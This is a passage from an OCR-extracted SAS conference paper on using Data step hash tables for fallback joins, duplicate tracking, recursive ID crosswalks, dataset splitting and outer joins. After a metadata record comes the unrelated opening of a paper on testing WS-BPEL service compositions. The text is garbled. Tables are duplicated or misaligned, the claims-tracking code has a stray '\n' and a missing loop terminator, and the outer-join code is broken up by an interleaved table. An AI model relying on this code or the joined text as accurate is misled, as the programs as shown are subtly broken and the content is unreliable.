small subsets of the 5-digit zip code. In some towns or cities, 9-digit zip codes contain enough people to provide summary statistics. In others, a single person might have his/her own 9-digit zip code. In the latter case, summary statistics would be available only at the 5-digit level. Given a dataset of members, we want to join the summary statistics at the finest level of detail available (try to join on 9-digit but if that is not available join on the 5-digit). <table> <thead> <tr> <th>Members</th> <th>Zip</th> <th>Zip_plus_4</th> </tr> </thead> <tbody> <tr> <td>Obs</td> <td>zip</td> <td>Member_id</td> </tr> <tr> <td>1</td> <td>04021</td> <td>164-234</td> </tr> <tr> <td>2</td> <td>22003-1234</td> <td>297-123</td> </tr> <tr> <td>3</td> <td>45459-0306</td> <td>344-123</td> </tr> <tr> <td>4</td> <td>03755</td> <td>395-123</td> </tr> <tr> <td>5</td> <td>94305</td> <td>495-987</td> </tr> <tr> <td>6</td> <td>78277-8310</td> <td>562-987</td> </tr> <tr> <td>7</td> <td>88044-3760</td> <td>697-123</td> </tr> </tbody> </table> <table> <thead> <tr> <th>Obs</th> <th>zip</th> <th>Member_id</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>04021</td> <td>164-234</td> </tr> <tr> <td>2</td> <td>22003-1234</td> <td>297-123</td> </tr> <tr> <td>3</td> <td>45459-0306</td> <td>344-123</td> </tr> <tr> <td>4</td> <td>03755</td> <td>395-123</td> </tr> <tr> <td>5</td> <td>94305</td> <td>495-987</td> </tr> <tr> <td>6</td> <td>78277-8310</td> <td>562-987</td> </tr> <tr> <td>7</td> <td>88044-3760</td> <td>697-123</td> </tr> </tbody> </table> In the illustration above, some members have a 5-digit zip code and some have a full 9-digit zip code. The reasons for the failure to match at the 9-digit level do not affect our strategy. If a match exists on the 9-digit table, we want the value of the income field from the 9-digit table to go on the Members record. If a match does not exist on the 9-digit table, for any reason, we want to fall back on the income field from the 5-digit table. **APPROACH** As in Example 2B, we will use one Data step and load 2 hash tables (one for the Zip5 level data and one for the Zip9 level data). For each record in the Members dataset we will first try to join to the Zip9 hash table. If this fails, we will join to the Zip5 hash table. This example enables us to introduce more error handling techniques. The ability to detect whether the lookup has been successful is useful in many scenarios. Here we use it to determine whether we need to attempt the lookup to a second table or not. The variable you name in the assignment statement that executes the method (for example, \( \text{rc} = \text{zip5}.\text{find}(); \)) will contain a zero after a successful execution of the method, or a non- zero value if the execution was not successful. In this case, if a row in the hash table Zip5 exists for the current value of the key variable Zip, \( \text{rc} = 0 \). If no row matching Zip5 exists, the value of \( \text{rc} \) will be non-zero immediately after the statement is executed. ```plaintext data member_income(drop=rc); length zip $ 9; declare hash Zip5 (dataset: 'Zip'); /* uses different way to load data */ rc = zip5.DefineKey ('Zip'); rc = zip5.DefineData ('Income'); rc = zip5.DefineDone (); declare hash Zip9 (dataset: 'Zip_plus_4'); /* uses different way to load data */ rc = Zip9.DefineKey ('Zip'); rc = Zip9.DefineData ('Income'); rc = Zip9.DefineDone (); do until (eof3) ; set members end = eof3; income = .; /* initialize income in case zip is not found at all */ rc = zip9.find (); if rc ne 0 then rc = zip5.find (); output; end; stop; run; ``` This code illustrates some new aspects of hash table processing. Instead of loading data into the hash table through a DO loop and SET statement, we take advantage of a feature of the DECLARE statement that allows us to name a dataset for loading the hash table. This is convenient when no modifications or exceptions are needed and the hash table needs to be loaded only once. The data are loaded when the DefineDone method is called. Only the fields identified in the DefineKey or DefineData method are excerpted from the named dataset. In the DO UNTIL (eof3) loop, we read each record from the Members dataset. We initialize income to missing before attempting to look up the income for that member’s zip code. This is necessary because the income variable will continue to hold the value from the last successful lookup. If neither lookup is successful for a given member, we run the risk of holding the income from the last member. The conditional lookup occurs next. First we attempt a match to the zip9 hash table ($rc = \text{zip9.find}();$) Next we test the $rc$ variable to see if that lookup was successful ($\text{if } rc \text{ ne } 0 \text{ then }$). Only if that lookup was not successful do we attempt a lookup to the zip5 hash table ($rc = \text{zip5.find}();$). The resulting dataset looks like this: <table> <thead> <tr> <th>Obs</th> <th>Member_id</th> <th>zip</th> <th>income</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>164-234</td> <td>04021</td> <td>$45,000</td> </tr> <tr> <td>2</td> <td>297-123</td> <td>22003-1234</td> <td>$56,999</td> </tr> <tr> <td>3</td> <td>344-123</td> <td>45459-0306</td> <td>$72,999</td> </tr> <tr> <td>4</td> <td>395-123</td> <td>03755</td> <td>$75,000</td> </tr> <tr> <td>5</td> <td>495-987</td> <td>94305</td> <td>$96,000</td> </tr> <tr> <td>6</td> <td>562-987</td> <td>78277-8310</td> <td>$32,999</td> </tr> <tr> <td>7</td> <td>697-123</td> <td>88044-3760</td> <td>$47,999</td> </tr> </tbody> </table> You can see that the Member records with 9-digit zip codes contain incomes from the 9-digit table (conveniently created ending in 999) and Member records with 5-digit zip codes contain incomes from the 5-digit table. This is the desired result—chalking up another one for hash tables! **ERROR HANDLING** Two techniques to avoid data errors in the case of mismatched data have been shown. It is essential to use one or more of them every time you employ hash tables. The choice depends on what you want your resulting dataset to contain. In example 1 above, we wanted to keep all the records from the main dataset, whether or not they were found on the hash table, so we took the precaution of initializing the looked up variable values to missing prior to each lookup. If the lookup failed, the variables remain missing. If you want an inner join, that is, you want the output dataset to contain only those records that are found on the hash table, you can control the output with the assignment variable: \[ \text{If } rc = 0 \text{ then output;} \] In this situation, it is not as essential that you initialize the variable(s) you are looking up, because in the event of a lookup failure, you are deleting the record. Now, on to more examples. **EXAMPLE 3: DÉJÀ VU** We now leave the world of joins to show a different application of hash tables. In this case, we need to keep track of what we have encountered in this pass of a dataset and compare subsequent records to every value of a particular variable we have seen before. We will take advantage of one of the huge assets of hash tables: no need to dimension them in advance (we don’t need to know how many values we might eventually load). Specifically, let’s conjure up a dataset of health care claims. For simplicity, let’s consider just the Member_id, the service date, and the diagnosis associated with the claim (dx). We will sort them in chronological order, and as we process each one, we want to know if it is the first claim for a given member (or, conversely, if we have seen that member before in this dataset of claims). As a bonus, let's also keep track of the latest (most recent) claim date for each member. And finally, let's output that information (a list of the unique members we have seen and the latest claim date for each) when we reach the end of the claims. This is in addition to the claims level data, which we will also output to a new dataset. **APPRAOCH** Unlike the previous examples, we do not have any data to load into the hash table when the Data step starts. Instead, we will create the structure only. As we process each claim, we will check the hash table to see whether the member is in there. In the beginning, no members will be in there. When we don't find a member, we will insert a record in the hash table with that member_id. We will also insert the date of the claim. As we process claims, we will eventually get to one for a member we have seen before. At that point, we do not want to insert a new record in the hash table, but we do want to update the field for the latest claim date. Since the claims are in chronological order, each new claim we encounter will have a date at least the same but more likely later than the date already entered for that member. When we get to the end of the claims dataset, we will output the hash table to a SAS dataset to preserve the information for later processing. ```sas data Processed_Claims(drop=rc); dcl hash members (ordered: 'a'); rc = members.DefineKey ('Member_id'); rc = members.DefineData ('Member_id','Latest_dt'); rc = members.DefineDone (); do until (eof) ; set claims end = eof; latest_dt = .; rc = members.find (); if rc eq 0 then do; * insert code to run if we have seen this member before * seen_it = 'YES'; end; else do; * insert code if we have not seen this member before* seen_it = 'NO'; end; latest_dt = svc_dt; members.REPLACE(); output; * output processed claim;\nmembers.OUTPUT(dataset: 'Member_latest'); * output member summary; stop; run; ``` In this code we see another feature of the DECLARE statement: the ability to specify that the data in the hash table be ordered in ascending sequence (by the key—you may not sort a hash table by anything other than the key). This is useful when the hash table will be output as a dataset. We also see a new wrinkle in the Define section: the key variable (Member_id) is listed both as the key and as an element of Data. This prepares for creating a dataset from the hash table data. The hash table key is used behind the scenes and does not exist as a data element in the hash table unless specified in the DefineData method. No data are loaded to the hash table initially. The Claims dataset is processed inside a DO loop (meaning that the Data step will execute in its entirety only once). After each record is read, we initialize the variable latest_dt to avoid holding it over from the last record. Then we try to find the Member_id in the hash table. If the rc eq 0 (meaning the member_id is already in the hash table), we can execute whatever other code would be appropriate for members we have seen before. We set a variable called seen_it to the value ‘YES’ just to show how the processing works. If we do not find the member_id in the hash table (if rc ne 0), we can execute the code appropriate to that circumstance. We set the variable seen_it to ‘NO’. Now, whether we have seen the member before or not, we set the latest_dt to the service date of the current claim and execute the REPLACE method. This will do one of two things: if the member_id already exists on the hash table, it will overwrite the record with the new latest_dt. If the member_id does not already exist on the hash table, it will add a record (with the current member_id and latest_dt) to the hash table. After the DO UNTIL loop completes, we know we have processed all the records in the claims dataset. At that point, we execute the OUTPUT method on the hash table Members to create a SAS dataset called Member_latest. The resulting datasets look like this: <table> <thead> <tr> <th>Obs</th> <th>Member_id</th> <th>svc_dt</th> <th>dx</th> <th>seen_it</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>164-234</td> <td>2005/01/01</td> <td>250</td> <td>NO</td> </tr> <tr> <td>2</td> <td>297-123</td> <td>2005/02/03</td> <td>4952</td> <td>NO</td> </tr> <tr> <td>3</td> <td>164-234</td> <td>2005/03/15</td> <td>78910</td> <td>YES</td> </tr> <tr> <td>4</td> <td>297-123</td> <td>2005/04/14</td> <td>250</td> <td>YES</td> </tr> <tr> <td>5</td> <td>297-123</td> <td>2005/08/19</td> <td>12345</td> <td>YES</td> </tr> <tr> <td>6</td> <td>164-234</td> <td>2005/09/13</td> <td>250</td> <td>YES</td> </tr> <tr> <td>7</td> <td>297-123</td> <td>2005/11/01</td> <td>4952</td> <td>YES</td> </tr> </tbody> </table> The variable seen_it allows us to note that the code executed correctly in determining whether each claim was that member’s first claim in the dataset. The rows in the Member_latest dataset show that we correctly identified all the unique members and the latest claim date for each. EXAMPLE 4: CHAIN (UNLIMITED RECURSIVE LOOKUPS) Hash tables are the ideal solution to this problem. Suppose you have a membership table, such as an insurance company might maintain on its members. At various points in a member’s history the unique ID might have changed. For example, in the health insurance industry when federal legislation required that the SSN become a private rather than a public ID, health insurance companies were required to assign new ID numbers to the entire membership. When ID’s change, you are faced with the problem of historical data: claims or other transactions that occurred prior to the change have the old ID while later transactions have the new ID. Furthermore, other events can cause member ID changes, so that a given member might have 3, 4, or more IDs over her entire history. How do you process a series of transactions with ID’s of an unknown generation on them? As long as you have a database of changes, hash tables provide an easy answer. Consider the following datasets: You can see that the Old_new_xwalk shows a chain of ID changes for 164-234. It was changed to N164-234 (Obs 1), then N164-234 was changed to M164-234 (Obs 4), then M164-234 was changed to P164-234 (Obs 6), and finally P164-234 was changed to A164-234 (Obs 7). Although most real cases don’t involve this many steps, the primary problem is that you don’t know how many steps a given ID might have and it is hard to write code to check “until done”. **APPROACH** The code below shows how to use a hash table to solve this problem. The first step is to load the Old_new_xwalk into a hash table. Then we process the records from the Members table, one at a time. For each record with a member_id, we check the hash table for rows where that member_id occurs in the “old_id” position. If we find a row, we have the new_id that it was changed to in the variable called New_id. To find out whether that ID was ever changed, we move that value to the Old_id position and again check the hash table for a row. If we find another row, it means that the new_id from the first row became the old_id in a new pair later on. We continue this process (putting the New_id in the Old_id position and checking the hash table) until we no longer find a row. When this happens, we know that the value currently stored in the Old_id position does not occur on the crosswalk table with any new_id assigned to it, so we conclude that we now have the latest ID for that person. ```r data members_update(drop=rc ); if 0 then set old_new_xwalk; /* sets up the variable types */ dcl hash xwalk (dataset: 'old_new_xwalk'); xwalk.definekey ('old_id'); xwalk.definedata ('new_id'); xwalk.definedone (); do until (eof); set members end=eof; new_id = ' '; old_id = member_id; do lookups = 1 by 1 until (rc ne 0 or lookups > 1000); /* provides a counter called lookups and stops infinite looping. See text below. */ rc = xwalk.FIND(); old_id = new_id; end; output; end; stop; run; ``` The integrity of the crosswalk is key to making this (or any solution) work. For example, if a given old_id occurs twice on the crosswalk assigned to two different New_ids, you have a “split” and it requires business input to decide how you want to treat those. The code shown in this example will not accept two rows into the hash table with the same key (old_id) so splits will not be present at processing time. If your crosswalk contains “merges” [cases where two different old_ids are assigned to the same new_id], this solution will process them correctly and assign all claims under both old_ids to the same new_id. The one problem we have to code around is the potential infinite loop that will occur if there are 2 records that assign A to B and then B to A. This is a business and data problem, but it will become a processing problem if allowed to sneak through. The code that checks for lookups > 1000 is one way to stop infinite looping caused by this data issue. It would be preferable to clean up your crosswalk before entering this process. The resulting dataset is shown below: <table> <thead> <tr> <th>Obs</th> <th>old_id</th> <th>new_id</th> <th>member_id</th> <th>plan_id</th> <th>group_id</th> <th>lookups</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>A164-234</td> <td>A164-234</td> <td>164-234</td> <td>XYZ</td> <td>G123</td> <td>5</td> </tr> <tr> <td>2</td> <td>B297-123</td> <td>B297-123</td> <td>297-123</td> <td>ABC</td> <td>G123</td> <td>3</td> </tr> <tr> <td>3</td> <td>C344-123</td> <td>C344-123</td> <td>344-123</td> <td>JKL</td> <td>G456</td> <td>2</td> </tr> <tr> <td>4</td> <td></td> <td>395-123</td> <td>XYZ</td> <td>G123</td> <td>1</td> <td></td> </tr> <tr> <td>5</td> <td></td> <td>495-987</td> <td>ABC</td> <td>G456</td> <td>1</td> <td></td> </tr> <tr> <td>6</td> <td></td> <td>562-987</td> <td>ABC</td> <td>G123</td> <td>1</td> <td></td> </tr> <tr> <td>7</td> <td></td> <td>697-123</td> <td>XYZ</td> <td>G456</td> <td>1</td> <td></td> </tr> </tbody> </table> The latest ID for each member is shown in both the Old_id and New_id field because the last step before stopping the lookup is to assign the latest value of the New_id variable to the Old_id field for another lookup. If no value occurs in either field it is because the member_id does not exist on the crosswalk in the Old_id field (meaning that ID was never changed). The counter in the Lookups field shows how many times we iterated through change before finding a value of New_id that had not been changed. Every member_id is looked up at least once, but if it does not exist in the crosswalk at all, no value appears in the New_id field. **EXAMPLE 5: OUTPUT N DATASETS** In this example, the goal is to split a dataset into N pieces, where N is determined by the number of distinct values in a particular field. In the past this might have been accomplished using macro code: preprocess the data to determine the number of datasets needed, then use macros to write a data statement with N datanames. With hash tables, no preprocessing is necessary. And as a bonus, you can give names to the datasets reflecting the value of the distinguishing variable represented in each dataset. Perhaps a concrete example will help clarify. Once again, consider our Members dataset. <table> <thead> <tr> <th>Obs</th> <th>member_id</th> <th>plan_id</th> <th>group_id</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>164-234</td> <td>XYZ</td> <td>G123</td> </tr> <tr> <td>2</td> <td>297-123</td> <td>ABC</td> <td>G123</td> </tr> <tr> <td>3</td> <td>344-123</td> <td>JKL</td> <td>G456</td> </tr> <tr> <td>4</td> <td>395-123</td> <td>XYZ</td> <td>G123</td> </tr> <tr> <td>5</td> <td>495-987</td> <td>ABC</td> <td>G456</td> </tr> <tr> <td>6</td> <td>562-987</td> <td>ABC</td> <td>G123</td> </tr> <tr> <td>7</td> <td>697-123</td> <td>XYZ</td> <td>G456</td> </tr> </tbody> </table> You can see that members belong to one of two different groups (G123 or G456). If we know this in advance, we can write code such as: ```plaintext Data group_G123 group_G456; set members; if group_id = 'G123' then output group_G123; else if group_id = 'G456' then output group_G456; run; ``` But what if you don’t know how many groups there are? We are using simple data for brevity of illustration; the code is the same for the larger situation. **APPROACH** To use hash tables in the way shown below, the Members dataset must be sorted by Group_id. You might consider this a small price to pay for the convenience of the solution. Once the data are sorted, we can process each group using the first.var and last.var automatic variables provided in the Data step for variables named in the By statement. Here is the code, followed by an explanation: ```sas proc sort data=members; by group_id; run; data _null_; if 0 then set members; /* create variable types */ dcl hash groups (ordered: 'a'); groups.definekey ('member_id','plan_id','_n_'); groups.definedata ('member_id','plan_id' ); groups.definedone (); do _n_ = 1 by 1 until (last.group_id); set members; by group_id; groups.add(); end; groups.output (dataset: compress('GROUP_'||group_id)); run; ``` After the sort, we start a Data step and create a hash table structure. Unlike our previous examples in which each hash table was filled only once, this example shows that you can empty and fill a hash table multiple times during the execution of the Data step. We will read successive records from Members and fill a hash table with all the records for a particular Group_ID. When we encounter the last record for that Group_id, we will output the contents of the hash table to a SAS dataset named using the value in the Group_id field at the time. We then allow the Data step to loop as it normally does, emptying and re-creating the hash table structure before starting to read the records associated with the next value of Group_id. Once again, this example shows that we have to put all the variables that we want to see in the output dataset in the DefineData method because the key variables are used only to construct the index. They do not exist on the hash table as data fields. In this example, the key actually contains more fields than the data. The reason for this is to allow multiple rows with the same member_id and plan_id. Remember that hash tables cannot have more than one row with the same key value. Unique keys are essential to the construction that delivers the amazing efficiency. Adding the _n_ variable to the key enforces uniqueness of key while allowing multiple rows with the same member_id and plan_id in the incoming (and outgoing) dataset. This would be a good time to discuss the heavy use of quoting in specifying parameters to the methods. The benefits of this are shown in the groups.output statement. All the methods are set up to accept variables as well as hard-coded values as parameters, allowing for data-driven code. In the case of the groups.output we can specify that the name of the dataset to be created is GROUP_ plus whatever value is in the group_id field at the time the statement is executed. This flexibility of allowing variables to be parameters requires that you quote anything you are hardcoding, to distinguish those from variable names (the same reason you have to code A="YES" instead of A=YES to distinguish the value YES from the variable name YES). The resulting datasets are shown below: You can see in the code that we specified only Member_id and Plan_id as fields on the hash tables; therefore, those are the only fields that show up in the output datasets. We could have kept Group_id to show that only Group_id = "G123" show up in the dataset GROUP_G123. All we would have to do is add Group_id to the DefineData method statement. **EXAMPLE 6: OUTER JOIN** The last example is included not so much because hash tables are always the right tool to use in this situation, but to respond to questions about whether a hash table can be used when an outer join is needed. Recall that an outer join of 2 datasets contains the union of all records in the datasets. It matches the records where the key value exists in both datasets, and it also includes records from each dataset where the key values do not appear in the other dataset. This example also introduces the only other object currently available in the Data Step Component Object Interface: the hash iterator object, or hiter. Consider the following datasets. One contains a list of members along with their Plan_id. The other contains members and their Group_ids. We want to build one dataset with all the members that exist in either table, along with their Plan_ids and Group_ids. Can we do an outer join on Member_id using hash tables? But of course! **APPROACH** We will start by loading one dataset (Mbr_group) into a hash table, adding a column for flagging whether that row in the hash table matches a row from the Mbr_plan dataset. We then process the Mbr_plan dataset one row at a time, looking it up in the hash table and flagging the rows we find. When we are completely finished with Mbr_plan, we use the hash iterator object to process the rows in the hash table (Mbr_group), and write to the output dataset the rows that were not flagged as previously found. Here is the code: ```plaintext data all ; * (drop=:_:); /* use this form of drop= if desired */ if 0 then set mbr_group; /* set up variables */ dcl hash hh (ordered: 'a'); dcl hiter hi ('hh'); /* hash iterator object */ hh.definekey ('member_id'); hh.definedata ('member_id','group_id','_f'); hh.definedone (); do until (eof2); set mbr_group end = eof2; ``` <table> <thead> <tr> <th>Mbr_plan</th> <th>Mbr_group</th> </tr> </thead> <tbody> <tr> <td>Obs</td> <td>Member_id</td> </tr> <tr> <td>1 164-111</td> <td>XYZ</td> </tr> <tr> <td>2 297-111</td> <td>ABC</td> </tr> <tr> <td>3 344-111</td> <td>JKL</td> </tr> <tr> <td>4 395-111</td> <td>XYZ</td> </tr> <tr> <td>5 495-111</td> <td>ABC</td> </tr> <tr> <td>6 562-111</td> <td>ABC</td> </tr> <tr> <td>7 697-111</td> <td>XYZ</td> </tr> <tr> <td>8 833-888</td> <td>G456</td> </tr> </tbody> </table> _f = .; /* initialize flag _f in hash table */ hh.add(); end; * Output all rows in mbr_plan *; do until(eof); set mbr_plan end = eof; call missing (group_id); /* initialize group_id for each new record in Mbr_plan*/ if hh.find() = 0 then do; _f = 1; hh.replace(); /* overwrite record in hash table with new value of _f*/ output; _f = .; /* initialize _f back to missing to prepare for next */ end; else output; end; /* at this point all Mbr_plan records have been read */ * Output remaining rows *; do _rc = hi.first() by 0 while (_rc = 0); if _f ne 1 then do; call missing (plan_id); /*rows in the hash table will not have values for plan_id */ output; end; _rc = hi.next(); end; end; stop; run; We set up a Data step to write a dataset called ALL. The drop= option is commented out but can be used as a convenience to drop all variables that start with an underscore. This will drop the variable _f from the dataset ALL. If you get in the habit of naming all your temporary variables with an initial _, you can use this form of the drop all the time. The statement "if 0 then set mbr_group;" establishes the variables in the dataset Mbr_group in the program data vector without actually reading any records. This is important so that when the hash table is declared, SAS knows what type and length each of the variables should be. A hash table named hh is created, with the specification that the rows be ordered in ascending sequence by the key value. Immediately afterward, a hash iterator object named hi is declared pointing to the hash table hh. The iterator object allows the use of methods like .first() and next() seen in the last DO loop. Once the hash table is declared, we fill it with the records from Mbr_group (the “do until (eof2)’’ loop). Note that we are assuming there are no duplicates on Member_id in either table. The method hh.add() will reject any row with a key value equal to an existing row. The next DO loop (do until (EOF)) processes the records from Mbr_plan, one at a time. For each record, group_id is initialized to avoid carrying forward the value from the last successful hh.find(). The statement “if hh.find() = 0 then do;” both executes the find() method and tests the result for success. If it is successful (if the member_id on the record we just read from Mbr_plan exists on the hash table), the value of group_id from the hash table will be brought into the Data step variable group_id. We set the flag _f to 1, signaling that we have found that record, and .replace() that row in the hash table. Since the current values of Member_id and Group_id in the Data step match what we just brought from the hash table, the only change the .replace() method accomplishes is to set the flag _f to 1 in the hash table. Once we do that and output the record to ALL, we reset the flag _f back to missing to prepare for reading the next record. If the rc from executing the .find() method on this record is not 0, meaning that member_id does not exist in the Mbr_group table, all we have to do is output the record to ALL (since we want records from either dataset, whether or not it matches a record in the other dataset). After the completion of the do until (eof) loop, we have finished reading all the records from Mbr_plan (and writing them to ALL). The last step is to take advantage of the methods available to the hash iterator object. These methods access the hash table that the iterator object is linked to (hh) and move a pointer through its rows, bringing the values from the hash table into the SAS program data vector. They are then ready for output to the SAS dataset. We can check each row of the hash table sequentially to see whether it was matched to a record from Mbr_plan. If not, we can output it to ALL. If it is flagged, we know it already exists in ALL and there is no need to output it. At the bottom of the data step, we know we have output all the records in Mbr_plan and all the records in Mbr_group to ALL, matching those with the same Member_id. Voilà, an outer join via hash tables! CONCLUSIONS In this paper you have seen a variety of applications for the new Data Step Component Object Interface tools called hash tables. This small set just scratches the surface of their potential utility. Hash tables deliver amazing efficiency for remarkably little investment in coding. They can be used in a variety of circumstances, and they solve at least one heretofore intractable problem. Limited only by available RAM and your imagination, these new Data Step Component Objects have revolutionized data processing. This paper provides you with the means and the motivation to use hash tables. Why not try them out today? REFERENCES DISCLAIMER All code contained in this paper is provided on an "AS IS" basis, without warranty. The author makes no representation, or warranty, either express or implied, with respect to the programs, their quality, accuracy, or fitness for a specific purpose. Therefore, the author shall have no liability to you or any other person or entity with respect to any liability, loss, or damage caused or alleged to have been caused directly or indirectly by the programs provided in this paper. This includes, but is not limited to, interruption of service, loss of data, loss of profits, or consequential damages from the use of these programs. ACKNOWLEDGMENTS SAS is a Registered Trademark of the SAS Institute, Inc. of Cary, North Carolina. This paper and the author owe an enormous debt to Paul Dorfman, who showed infinite kindness and patience to someone learning not just about hash tables but about various intricacies of the Data step. Thanks also to developers at SAS Institute for consultation on specific topics. Any errors in this paper are those of the author not of the information suppliers. CONTACT INFORMATION Your comments and questions are valued and encouraged. Contact the author at: Judy Loren Independent Consultant P. O. Box 306 Cumberland, ME 04021 JLoren@maine.rr.com *****************************************************************************
{"Source-Url": "https://www.lexjansen.com/scsug/2007/data/Data-Loren.pdf", "len_cl100k_base": 11902, "olmocr-version": "0.1.53", "pdf-total-pages": 14, "total-fallback-pages": 0, "total-input-tokens": 33466, "total-output-tokens": 12412, "length": "2e13", "weborganizer": {"__label__adult": 0.0002770423889160156, "__label__art_design": 0.0004551410675048828, "__label__crime_law": 0.0003535747528076172, "__label__education_jobs": 0.0015888214111328125, "__label__entertainment": 8.487701416015625e-05, "__label__fashion_beauty": 0.00014388561248779297, "__label__finance_business": 0.00165557861328125, "__label__food_dining": 0.0003285408020019531, "__label__games": 0.0005774497985839844, "__label__hardware": 0.0008788108825683594, "__label__health": 0.0005888938903808594, "__label__history": 0.00023496150970458984, "__label__home_hobbies": 0.00021004676818847656, "__label__industrial": 0.0007009506225585938, "__label__literature": 0.00019633769989013672, "__label__politics": 0.0002257823944091797, "__label__religion": 0.0002818107604980469, "__label__science_tech": 0.057098388671875, "__label__social_life": 0.00012421607971191406, "__label__software": 0.09417724609375, "__label__software_dev": 0.83935546875, "__label__sports_fitness": 0.0001938343048095703, "__label__transportation": 0.0003273487091064453, "__label__travel": 0.0001811981201171875}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 43413, 0.05859]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 43413, 0.34398]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 43413, 0.86971]], "google_gemma-3-12b-it_contains_pii": [[0, 3817, false], [3817, 7665, null], [7665, 9716, null], [9716, 12276, null], [12276, 15660, null], [15660, 19043, null], [19043, 21488, null], [21488, 24987, null], [24987, 27767, null], [27767, 30644, null], [30644, 33904, null], [33904, 36813, null], [36813, 40383, null], [40383, 43413, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3817, true], [3817, 7665, null], [7665, 9716, null], [9716, 12276, null], [12276, 15660, null], [15660, 19043, null], [19043, 21488, null], [21488, 24987, null], [24987, 27767, null], [27767, 30644, null], [30644, 33904, null], [33904, 36813, null], [36813, 40383, null], [40383, 43413, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 43413, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 43413, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 43413, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 43413, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 43413, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 43413, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 43413, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 43413, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 43413, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 43413, null]], "pdf_page_numbers": [[0, 3817, 1], [3817, 7665, 2], [7665, 9716, 3], [9716, 12276, 4], [12276, 15660, 5], [15660, 19043, 6], [19043, 21488, 7], [21488, 24987, 8], [24987, 27767, 9], [27767, 30644, 10], [30644, 33904, 11], [33904, 36813, 12], [36813, 40383, 13], [40383, 43413, 14]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 43413, 0.24826]]}
olmocr_science_pdfs
2024-12-10
2024-12-10
1d00d00a60d39f3d7f1c3a725b5cd8e46cc88f78
Automated Testing of WS-BPEL Service Compositions: A Scenario-Oriented Approach Chang-ai Sun, Member, IEEE, Yan Zhao, Lin Pan, Huai Liu, Member, IEEE, and Tsong Yueh Chen, Member, IEEE Abstract— Nowadays, Service Oriented Architecture (SOA) has become one mainstream paradigm for developing distributed applications. As the basic unit in SOA, Web services can be composed to construct complex applications. The quality of Web services and their compositions is critical to the success of SOA applications. Testing, as a major quality assurance technique, is confronted with new challenges in the context of service compositions. In this paper, we propose a scenario-oriented testing approach that can automatically generate test cases for service compositions. Our approach is particularly focused on the service compositions specified by Business Process Execution Language for Web Services (WS-BPEL), a widely recognized executable service composition language. In the approach, a WS-BPEL service composition is first abstracted into a graph model; test scenarios are then derived from the model; finally, test cases are generated according to different scenarios. We also developed a prototype tool implementing the proposed approach, and an empirical study was conducted to demonstrate the applicability and effectiveness of our approach. The experimental results show that the automatic scenario-oriented testing approach is effective in detecting many types of faults seeded in the service compositions. Index Terms—Service Oriented Architecture, service compositions, Business Process Execution Language for Web Services, scenario-oriented testing. 1 INTRODUCTION S ervice Oriented Architecture (SOA) [22] has been widely applied into the development of various distributed applications. Web services, the basic applications in SOA, are often developed and owned by a third party, and are published and deployed in an open and dynamic environment. A single Web service normally provides limited functionalities, so multiple Web services are expected to be composed to implement complex and flexible business processes. Business Process Execution Language for Web Services (WS-BPEL) [14] is a popular language for service compositions. In the context of WS-BPEL, all communications among Web services are via standard eXtensible Markup Language (XML) messages [35], which provides a perfect solution to address the challenging issues in a distributed and heterogeneous environment, such as data exchange and application interoperability. Moreover, Web services inside service compositions can be easily replaced to cater for the quickly changing business requirements and environments due to its loosely coupled feature. However, ensuring the quality of such loosely coupled service compositions becomes difficult yet important. Testing is a practical and feasible approach to the quality assurance of service-based systems [4], [27]. It mainly involves two aspects, namely testing individual Web services and testing service compositions. The former is usually done by service developers, and lots of testing techniques are available [21], [29], [25], while the latter is left for service consumers, which corresponds to the integrated testing. However, service composition testing is greatly different from the traditional integrated testing in two aspects. First, Web services are developed and tested independently. Thus, it is hard for service developers to expect all possible scenarios. Second, services within compositions are usually abstract ones and only bound to concrete Web services at run-time. This run-time binding delays the execution of testing and calls for the on-the-fly testing techniques. In this context, traditional integrated testing techniques are not applicable. In the previous work [26], [30], [39], a model-based approach has been proposed to automatically generating a set of test scenarios based on UML activity diagram specifications. With this approach, testers can test on demand the corresponding programs whose behaviors are described by UML activity diagrams. WS-BPEL specifications in nature are very similar to UML activity diagram specifications because they are both based on the state machine and provide the mechanism for supporting concurrent control flows. Unlike UML activity diagram specifications, WS-BPEL specifications are executable programs rather than workflow models. In this paper, based on our recent study [28], we propose an automatic scenario-oriented testing approach for WS-BPEL service compositions. This approach leverages the previous work [26], [30], [39] on testing UML activity di- This article has been accepted for publication in a future issue of this journal, but has not been fully edited. Content may change prior to final publication. Citation information: DOI 10.1109/TSC.2015.2466572, IEEE Transactions on Services Computing IEEE TRANSACTIONS ON SERVICES COMPUTING, VOL. XXX, NO. XXX, JANUARY 2015 2 agrements in the context of SOA, and addresses the challenges of testing loosely coupled and run-time binding service compositions. In our approach, an abstract test model is first defined to represent WS-BPEL processes. Then, test scenarios are generated from the test model with respect to the given coverage criteria. Finally, test data are generated and selected to drive the execution of test scenarios. However, in the preliminary study, the approach, especially the final step of test case generation, was not fully automated. In this paper, we not only present basic ideas of the approach, but also propose novel techniques for fully automating the proposed approach. We also developed a prototype tool that implements the proposed approach in the SOA environment. In addition, an empirical study has been conducted to demonstrate our approach and validate its applicability and effectiveness. The main contributions of this paper, together with its preliminary version [28], 